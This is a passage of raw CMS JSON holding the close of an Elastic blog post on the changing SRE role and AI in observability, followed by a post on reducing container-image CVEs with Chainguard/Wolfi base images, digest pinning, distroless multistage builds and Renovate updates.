implementation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBut the optimism about future value is striking with nearly 40% of teams expecting to derive high value from AI/ML in their observability practices in the coming years. This confidence indicates that while teams may be struggling with current implementations, they see clear potential for these technologies to transform their operations.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs87e3d7d8f901aa1c"}}},{"image":{"image":{"uid":"blt3f3ba3e3048fb0f8","_version":1,"title":"image4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-19T20:05:24.351Z","updated_at":"2024-12-19T20:05:24.351Z","content_type":"image/png","file_size":"163987","filename":"image4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-19T20:19:08.587Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f3ba3e3048fb0f8/67647c845c0f674f8d8190b2/image4.png"},"_metadata":{"uid":"csf35b9b970b605a7b"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs945de078d6de321e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe evolution of AI in observability mirrors a broader pattern we've seen with many technological transformations: early adoption focused on automating existing processes followed by more transformative applications that fundamentally change how we work — essentially, leaping across the chasm as seen in the technology adoption lifecycle model above. Current AI implementations often focus on augmenting traditional observability practices — making existing workflows more efficient. The real transformation will likely come as these technologies mature and enable entirely new approaches to understanding and maintaining complex systems.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Looking ahead","_metadata":{"uid":"cs14a273cbc4b834bb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe potential applications of AI in observability extend far beyond correlation and troubleshooting. Imagine systems that can predict potential failures before they occur, automatically adjust their own monitoring parameters based on changing conditions, or provide natural language interfaces for complex system queries. These capabilities, while still emerging, could fundamentally change how teams approach system reliability and performance optimization.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe survey data also suggests an important shift in how organizations view the relationship between AI and human expertise. Rather than replacing human judgment, AI is increasingly seen as a tool for augmenting human capabilities — helping practitioners handle the growing scale and complexity of modern systems while freeing them to focus on more strategic work.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis evolution in AI capabilities could also help address the growing cost management responsibilities many teams face. Advanced AI systems could help optimize resource utilization, suggest cost-saving measures, and balance performance requirements with budget constraints — all while maintaining required reliability levels.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor organizations considering or currently implementing AI-enabled observability solutions, these findings suggest a measured approach: Embrace the technology's current capabilities while preparing for its evolution. Focus on use cases with proven value like telemetry correlation while building the foundational knowledge and infrastructure needed to take advantage of more advanced capabilities as they mature.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe gap between current and expected value from AI/ML in observability represents both a challenge and an opportunity. While teams may need to temper their expectations for immediate transformative results, the potential for these technologies to revolutionize observability practices remains strong. As AI capabilities and teams continue to mature, organizations will become more sophisticated in their implementations. We're also likely to see that value gap close, ushering in a new era of intelligent observability practices, including cost controls.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Embracing the evolution of an SRE","_metadata":{"uid":"csac739709a3fc7a33"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe expanding role of SREs brings both challenges and opportunities. Yes, we're being asked to wear more hats than ever before. But this also means we have more opportunities to drive strategic value for our organizations.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy embracing these new responsibilities, particularly around cost optimization and AI, we can elevate our role from \"keeping the lights on\" to driving business success. And isn't that why many of us got into this field in the first place — to make a real, tangible impact on our companies and the users we serve?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo, if your CTO drops a cost-cutting bombshell in your lap, try not to let your stomach drop. Instead, see it as an opportunity to flex your SRE muscles (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/observability/white-paper/state-of-observability-practitioner-perspective\"\u003e\u003cspan style='font-size: 12pt;'\u003edetails in this recent survey\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e) and use your \u003c/span\u003e\u003ca href=\"https://www.elastic.co/explore/devops-observability/understanding-aiops-for-observability\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in new and impactful ways. After all, in the world of SRE, change is the only constant — and that's exactly what makes this job so exciting.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs20180d3b50841a8e"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd1326a6b67243aa1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs69c0fdd4c7435d7c"}}}],"publish_date":"2024-12-19","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"A look at the expanding roles of SREs and the new skills needed: cost management and AI","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt3e8a34e1dd0a5be5","_version":1,"title":"elastic-de_149846_720x420_05-B.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-19T20:16:57.039Z","updated_at":"2024-12-19T20:16:57.039Z","content_type":"image/jpeg","file_size":"112572","filename":"elastic-de_149846_720x420_05-B.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-19T20:19:08.555Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3e8a34e1dd0a5be5/67647f39294a2b6e823af634/elastic-de_149846_720x420_05-B.jpg"},"title":"The evolving role of SREs: Balancing reliability, cost, and innovation","title_l10n":"The evolving role of SREs: Balancing reliability, cost, and innovation","updated_at":"2024-12-19T20:19:03.208Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/site-reliability-engineer-role-evolution","publish_details":{"time":"2024-12-19T20:19:08.238Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltfa63352747c41493","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Significantly reduce CVEs in Elastic container images by switching to using Chainguard minimal base images in our Elastic products and optimizing our workflows for a scalable vulnerability management program.","author":["blt04e7376a7e72786f"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-12-19T18:17:36.431Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9457d7027b8ce4e9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog post, we will discuss our journey to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003esignificantly\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ereduce Common Vulnerabilities and Exposures (CVEs) in Elastic container images \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eby switching to a minimal base image in our Elastic products and optimizing our workflows for a scalable vulnerability management program.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Stack based on Chainguard images","_metadata":{"uid":"csd13bf1fb3abe3910"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.chainguard.dev/chainguard-images\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eChainguard images\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e are a collection of container images that meet the requirements of the secure software supply chain, including verifiable signatures, provenance, software bills of materials (SBOM), few CVEs, and small image sizes. The images are built on top of the \u003c/span\u003e\u003ca href=\"https://github.com/wolfi-dev\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eWolfi project\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which aims to provide a secure and minimal base image for containerized applications.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStarting with version 8.16, Elastic provides a variant of the Elastic Stack containers based on Chainguard images. The Chainguard variant of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.16/docker.html#docker-wolfi-hardened-image\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch 8.16\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e was released a few days ago with a lower count of CVEs compared to previous versions, and the in-progress 8.17 development version is already down to only 1 low CVE.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa35a6223b9db9336"}}},{"code":{"code":"$ snyk container test docker.elastic.co/elasticsearch/elasticsearch-wolfi:8.17.1-SNAPSHOT\n\nPackage manager: apk\n✔ Tested 58 dependencies for known issues, no vulnerable paths found.\n...\nTested 108 projects, 1 contained vulnerable paths.","_metadata":{"uid":"csb9ed52e96b17e545"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb74d9e4ad4355afc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUse the following commands to pull the Elastic Stack images based on Wolfi as mentioned on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html#docker-wolfi-hardened-image\"\u003e\u003cspan style='font-size: 12pt;'\u003eeach product documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e page:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs38918e7643204fa8"}}},{"code":{"code":"docker pull docker.elastic.co/elasticsearch/elasticsearch-wolfi:\u003cVERSION\u003e\ndocker pull docker.elastic.co/kibana/kibana-wolfi:\u003cVERSION\u003e\ndocker pull docker.elastic.co/logstash/logstash-wolfi:\u003cVERSION\u003e\ndocker pull docker.elastic.co/apm/apm-server-wolfi:\u003cVERSION\u003e\ndocker pull docker.elastic.co/elastic-agent/elastic-agent-wolfi:\u003cVERSION\u003e\ndocker pull docker.elastic.co/beats/filebeat-wolfi:\u003cVERSION\u003e\ndocker pull docker.elastic.co/beats/metricbeat-wolfi:\u003cVERSION\u003e","_metadata":{"uid":"cs81334bc5f23f8990"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs79ce13cf842776c4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Wolfi-based images are not the default ones for several reasons:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo avoid breaking customer workloads that rely on Ubuntu packages\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo ensure non-Elastic users can keep building default images from the source code\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo maintain the same user experience when pulling the default Elasticsearch images from Docker Official, Docker Hub, AWS ECR, and the Elastic container registry\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs25de5fdfd5e7ef79"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs37003f9389cbf78e"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eNote on the compatibility with Docker versions 20.10.10 or higher\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eFor users relying on Docker as their container engine, deploying Elastic Stack images based on Wolfi requires Docker version 20.10.10 (which is end of life as of December 10, 2023) or higher. The incompatibility is due to recent images using a version of glibc newer than 2.34. glibc 2.34+ defaults to using a new clone3 syscall. For backward compatibility, glibc attempts to fall back to clone when encountering the ENOSYS error. However, the default seccomp filter in Docker 20.10.9 and lower versions causes an EPERM error, which is treated as a fatal error by glibc and prevents the fallback from occurring. A fix has been backported to \u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://docs.docker.com/engine/release-notes/20.10/#runtime\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eDocker version 20.10.10 and above\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e, addressing the compatibility issue. \u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eECE customers running Elastic Stack 8.16+ require a Docker version 20.10.10 or higher.\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"Approach to addressing vulnerabilities","_metadata":{"uid":"cs75edf9325e3e5cd8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEngineering and information security teams worked on addressing vulnerability management challenges to achieve multiple goals: to provide hardened containers to our customers; to help with compliance regulations; to improve our supply chain security posture; and to reduce the burden of addressing and triaging CVEs on our customers, engineering, security, and support teams. The impact spans across Elastic products, including Elastic Self-Managed offerings (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/elastic-stack\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Stack\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e), Elastic Cloud on Kubernetes (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud-on-k8s/current/k8s-overview.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eECK\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e), and Elastic Cloud (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/serverless\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eServerless\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-getting-started.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHosted\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e).\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAt a high level, the first step was to define how teams within the organization would comply with the vulnerability management program and the associated service level objective (SLO) used to measure compliance. Next, we focused on deploying tools and processes to ensure that engineering teams are proactively notified, enabling them to efficiently manage their projects in order to meet these objectives and respond appropriately when these SLOs are breached. This initiative was founded on the following principles:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e(1) \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEstablish a secure foundation:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e By building on top of the \u003c/span\u003e\u003ca href=\"https://www.chainguard.dev/chainguard-images\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eChainguard images\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, we set up a foundation for success to build securely by default across the organization — providing automatic and fast vulnerability remediation without adding burden to our engineers.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e(2) \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eOptimize for container workload:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Every component included in the container image must be required and optimized for the targeted runtime environment.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e(3) \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eContinuous code analysis:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Software composition analysis (SCA) tooling runs continuously to build a comprehensive inventory of open source third-party components in Elastic products and proactively identify and mitigate issues that may impact our products because of their use.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e(4) \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCVE SLO quality gates:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Enable enforcement of CVE SLO checks before a container image is released or deployed to production.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e(5) \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eContinuous monitoring:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Teams are automatically notified when their products running in production are not compliant anymore as new vulnerabilities are frequently discovered, including impact container images that were free of vulnerabilities by the time of their deployment to production.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e(*) \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFrequent updates:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Critical to the success of this initiative, the efforts in (1) to (5) are useless without deploying frequently. Processes are in place to ensure the events triggered by (1), (3), or (5) lead to notifications for a new deployment.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Establish a secure foundation with automated updates","_metadata":{"uid":"cs8c8eaf10c3290859"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe workflow that ensures a smooth experience for engineers at Elastic in using secure-based images for their container products and keeping them up to date is built upon the Chainguard images product, the Renovate project, and best practices in supply chain security.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic uses a mix of Chainguard developer and production images that are regularly synchronized to the Elastic container registry with their signatures and SBOMs. Prior to being synchronized, each image signature is verified using \u003c/span\u003e\u003ca href=\"https://docs.sigstore.dev/cosign/verifying/verify/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ecosign\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Storing these images in the Elastic registry provides the optimal developer experience for Elastic engineers, mitigates the risk of incidents arising from third-party systems, and ensures control over the source from which our containers are pulled in production.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe provide documentation to engineers that outlines several key practices. First, it emphasizes the importance of referencing a tag and a digest for each base image used — pinning a container image to a digest ensures maximal build reproducibility, and while image tags are mutable, digests are not. Additionally, engineers are encouraged to use Docker multistage builds by combining a fully featured image at build time with a distroless image at runtime. Distroless images significantly reduce the attack surface of a container by containing only the application and its runtime dependencies, thereby minimizing the risk of vulnerabilities associated with the base image.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://docs.renovatebot.com/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eRenovate\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is an open source tool to automate the maintenance of software dependencies. It’s configured to improve developer experience for updating Chainguard images used in the Elastic GitHub repositories by automatically raising pull requests to modify the base images digest as soon as new ones are available. As shown below, Renovate is configured in the Elasticsearch repository to ensure the \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch/pull/118901\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ebase image digests get automatically updated\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e on the releasable git branches when Chainguard provides a new version:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs785b44a98a8fb019"}}},{"image":{"image":{"uid":"blta329ea8f1397c2d8","_version":1,"title":"image-update-docker.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-19T18:07:15.631Z","updated_at":"2024-12-19T18:07:15.631Z","content_type":"image/png","file_size":"408463","filename":"image-update-docker.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-19T18:24:06.464Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta329ea8f1397c2d8/676460d3294a2b15c13af4ee/image-update-docker.png"},"_metadata":{"uid":"cs388f751deb18bf85"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"ECK 2.16 released with 0 CVE","_metadata":{"uid":"cs831129e4716b4c04"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBuilt on the Kubernetes Operator pattern, ECK extends the basic Kubernetes orchestration capabilities to support the setup and management of the Elastic Stack. On December 18, 2024, ECK 2.16.0 was released with\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e 0 CVE!\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs212b5177774b6eb9"}}},{"code":{"code":"$ snyk container test docker.elastic.co/eck/eck-operator:2.16.0\n\n✔ Tested 3 dependencies for known issues, no vulnerable paths found.\n...\n✔ Tested 707 dependencies for known issues, no vulnerable paths found.\n\nTested 2 projects, no vulnerable paths were found.","_metadata":{"uid":"csd7413819de8e5391"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf6391da37322361f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLooking at the \u003c/span\u003e\u003ca href=\"https://github.com/elastic/cloud-on-k8s/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eECK repository codebase\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and especially the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eDockerfile\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, it illustrates the best practices mentioned above:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA multistage build phase using the Chainguard Go image to build the binary from the Elastic container registry that is referenced via the tags and digest values to ensure build reproducibility and automated updates:\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs0488c7d4542ce272"}}},{"code":{"code":"# Build the operator binary\nFROM docker.elastic.co/wolfi/go:1.23.4@sha256:0c563962687ca1d5677b810d2fcb6c1dcb7bd650c822999c715ad715590f14bb AS builder\n...\n# Build\nRUN --mount=type=cache,mode=0755,target=/go/pkg/mod \\\n CGO_ENABLED=0 GOOS=linux LICENSE_PUBKEY=/$LICENSE_PUBKEY make go-build","_metadata":{"uid":"cse2b0726704b96e2f"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs56f8d9dbfde7c9e7"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eA multistage runtime phase using a distroless image to reduce the attack surface that is always referenced by a tag+digest value:\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs087f4cb17bd6dd00"}}},{"code":{"code":"FROM docker.elastic.co/wolfi/static:latest@sha256:5ff428f8a48241b93a4174dbbc135a4ffb2381a9e10bdbbc5b9db145645886d5\n...\nCOPY --from=builder /go/src/github.com/elastic/cloud-on-k8s/elastic-operator /elastic-operator\n...\nENTRYPOINT [\"/elastic-operator\"]\nCMD [\"manager\"]","_metadata":{"uid":"cs72b9dc022bc52ccc"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs08640f4fb0466cdc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs94199e924f2aff36"}}}],"publish_date":"2024-12-19","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltbf6fd364f32f8563","ACL":{},"created_at":"2023-11-06T21:50:46.524Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fleet-elastic-agent","label_l10n":"Fleet/Elastic Agent","tags":[],"title":"Fleet/Elastic Agent","updated_at":"2023-11-06T21:50:46.524Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:48:26.489Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"bltad849a44c42eea31","ACL":{},"created_at":"2020-06-17T03:25:54.912Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"software-technology","label_l10n":"Software \u0026 technology","tags":[],"title":"Software \u0026 technology","updated_at":"2020-07-06T22:17:33.856Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.842Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8adcbb1adf4f30dc","ACL":{},"created_at":"2020-06-17T03:37:36.199Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack-security","label_l10n":"Stack security","tags":[],"title":"Stack 